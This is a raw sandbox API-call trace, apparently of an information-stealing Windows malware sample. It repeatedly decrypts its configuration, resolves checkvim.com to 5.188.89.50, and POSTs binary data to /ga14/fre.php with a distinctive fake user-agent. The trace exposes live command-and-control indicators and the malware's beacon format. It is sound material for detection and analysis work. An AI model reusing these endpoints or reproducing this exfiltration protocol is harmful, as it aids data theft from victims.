(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.316] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.317] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.317] GetProcessHeap () returned 0x840000 [0249.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0249.317] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0249.318] GetProcessHeap () returned 0x840000 [0249.318] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0249.318] GetProcessHeap () returned 0x840000 [0249.318] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0249.318] GetProcessHeap () returned 0x840000 [0249.318] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0249.318] GetProcessHeap () returned 0x840000 [0249.318] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0249.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.319] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0249.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.327] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0249.335] GetProcessHeap () returned 0x840000 [0249.335] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0249.336] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.337] CryptImportKey (in: hProv=0x86f930, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0249.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.338] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0249.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.339] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.339] GetProcessHeap () returned 0x840000 [0249.339] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0249.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.340] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0249.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.341] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0249.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.342] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0249.343] GetProcessHeap () returned 0x840000 [0249.343] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0249.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.344] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0249.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.345] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0249.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.346] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0249.347] GetProcessHeap () returned 0x840000 [0249.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0249.347] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0249.349] GetProcessHeap () returned 0x840000 [0249.349] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0249.349] socket (af=2, type=1, protocol=6) returned 0x374 [0249.350] connect (s=0x374, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0249.425] FreeAddrInfoW (pAddrInfo=0x8713a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0249.425] GetProcessHeap () returned 0x840000 [0249.425] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fb50 [0249.425] GetProcessHeap () returned 0x840000 [0249.425] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0249.425] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0249.427] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0249.427] GetProcessHeap () returned 0x840000 [0249.427] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0249.427] GetProcessHeap () returned 0x840000 [0249.427] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0249.427] GetProcessHeap () returned 0x840000 [0249.427] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f758 [0249.427] GetProcessHeap () returned 0x840000 [0249.427] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0249.428] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0249.429] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0249.429] GetProcessHeap () returned 0x840000 [0249.429] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0249.429] GetProcessHeap () returned 0x840000 [0249.429] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0249.429] send (s=0x374, buf=0x873a58*, len=237, flags=0) returned 237 [0249.429] send (s=0x374, buf=0x87eb58*, len=159, flags=0) returned 159 [0249.429] GetProcessHeap () returned 0x840000 [0249.429] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0249.429] recv (in: s=0x374, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 237 [0249.781] GetProcessHeap () returned 0x840000 [0249.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0249.781] GetProcessHeap () returned 0x840000 [0249.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0249.781] GetProcessHeap () returned 0x840000 [0249.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0249.781] GetProcessHeap () returned 0x840000 [0249.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fb50 | out: hHeap=0x840000) returned 1 [0249.781] closesocket (s=0x374) returned 0 [0249.781] GetProcessHeap () returned 0x840000 [0249.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0249.781] GetProcessHeap () returned 0x840000 [0249.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0249.782] GetProcessHeap () returned 0x840000 [0249.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0249.782] GetProcessHeap () returned 0x840000 [0249.782] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0249.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8805c8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1010) returned 0x374 [0249.785] Sleep (dwMilliseconds=0xea60) [0249.793] GetProcessHeap () returned 0x840000 [0249.794] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa28 [0249.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.795] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0249.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.803] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0249.811] GetProcessHeap () returned 0x840000 [0249.811] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0249.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.815] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0249.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.816] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0249.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.817] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.817] GetProcessHeap () returned 0x840000 [0249.817] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0249.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.819] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa28, pdwDataLen=0x19f9a4 | out: pbData=0x87fa28, pdwDataLen=0x19f9a4) returned 1 [0249.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.820] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0249.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.821] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0249.821] GetProcessHeap () returned 0x840000 [0249.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0249.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.823] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.824] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.825] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.826] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.826] GetProcessHeap () returned 0x840000 [0249.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0249.826] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0249.827] GetProcessHeap () returned 0x840000 [0249.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0249.827] GetProcessHeap () returned 0x840000 [0249.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0249.827] GetProcessHeap () returned 0x840000 [0249.827] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0249.827] GetProcessHeap () returned 0x840000 [0249.827] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0249.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.828] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0249.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.835] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0249.842] GetProcessHeap () returned 0x840000 [0249.843] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0249.843] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.844] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0249.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.845] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0249.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.846] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.847] GetProcessHeap () returned 0x840000 [0249.847] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0249.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.848] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0249.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.849] CryptDestroyKey (hKey=0x87e330) returned 1 [0249.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0249.850] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0249.850] GetProcessHeap () returned 0x840000 [0249.850] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0249.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.852] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0249.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.853] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0249.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0249.854] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0249.854] GetProcessHeap () returned 0x840000 [0249.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0249.854] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0249.856] GetProcessHeap () returned 0x840000 [0249.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0249.856] socket (af=2, type=1, protocol=6) returned 0x378 [0249.856] connect (s=0x378, name=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0249.927] FreeAddrInfoW (pAddrInfo=0x871290*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789c8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0249.927] GetProcessHeap () returned 0x840000 [0249.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0249.927] GetProcessHeap () returned 0x840000 [0249.927] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0249.927] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0249.928] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0249.928] GetProcessHeap () returned 0x840000 [0249.928] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0249.929] GetProcessHeap () returned 0x840000 [0249.929] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0249.929] GetProcessHeap () returned 0x840000 [0249.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f710 [0249.929] GetProcessHeap () returned 0x840000 [0249.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0249.929] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0249.930] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0249.930] GetProcessHeap () returned 0x840000 [0249.930] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0249.930] GetProcessHeap () returned 0x840000 [0249.930] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0249.930] send (s=0x378, buf=0x873a58*, len=237, flags=0) returned 237 [0249.931] send (s=0x378, buf=0x87eb58*, len=159, flags=0) returned 159 [0249.931] GetProcessHeap () returned 0x840000 [0249.931] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8805c8 [0249.931] recv (in: s=0x378, buf=0x8805c8, len=4048, flags=0 | out: buf=0x8805c8*) returned 237 [0250.332] GetProcessHeap () returned 0x840000 [0250.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0250.332] GetProcessHeap () returned 0x840000 [0250.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0250.332] GetProcessHeap () returned 0x840000 [0250.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0250.332] GetProcessHeap () returned 0x840000 [0250.332] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0250.332] closesocket (s=0x378) returned 0 [0250.333] GetProcessHeap () returned 0x840000 [0250.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0250.333] GetProcessHeap () returned 0x840000 [0250.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0250.333] GetProcessHeap () returned 0x840000 [0250.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0250.333] GetProcessHeap () returned 0x840000 [0250.333] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0250.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8805c8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xb78) returned 0x378 [0250.341] Sleep (dwMilliseconds=0xea60) [0250.342] GetProcessHeap () returned 0x840000 [0250.342] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0250.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.344] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0250.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.351] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0250.372] GetProcessHeap () returned 0x840000 [0250.372] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0250.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.373] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0250.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.375] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0250.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.376] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.376] GetProcessHeap () returned 0x840000 [0250.376] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0250.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.377] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fcf8, pdwDataLen=0x19f9a4 | out: pbData=0x87fcf8, pdwDataLen=0x19f9a4) returned 1 [0250.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.378] CryptDestroyKey (hKey=0x87e830) returned 1 [0250.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0250.379] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0250.379] GetProcessHeap () returned 0x840000 [0250.379] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0250.380] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.380] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.386] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.387] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.388] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0250.389] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.389] GetProcessHeap () returned 0x840000 [0250.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0250.389] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0250.389] GetProcessHeap () returned 0x840000 [0250.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0250.389] GetProcessHeap () returned 0x840000 [0250.389] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0250.389] 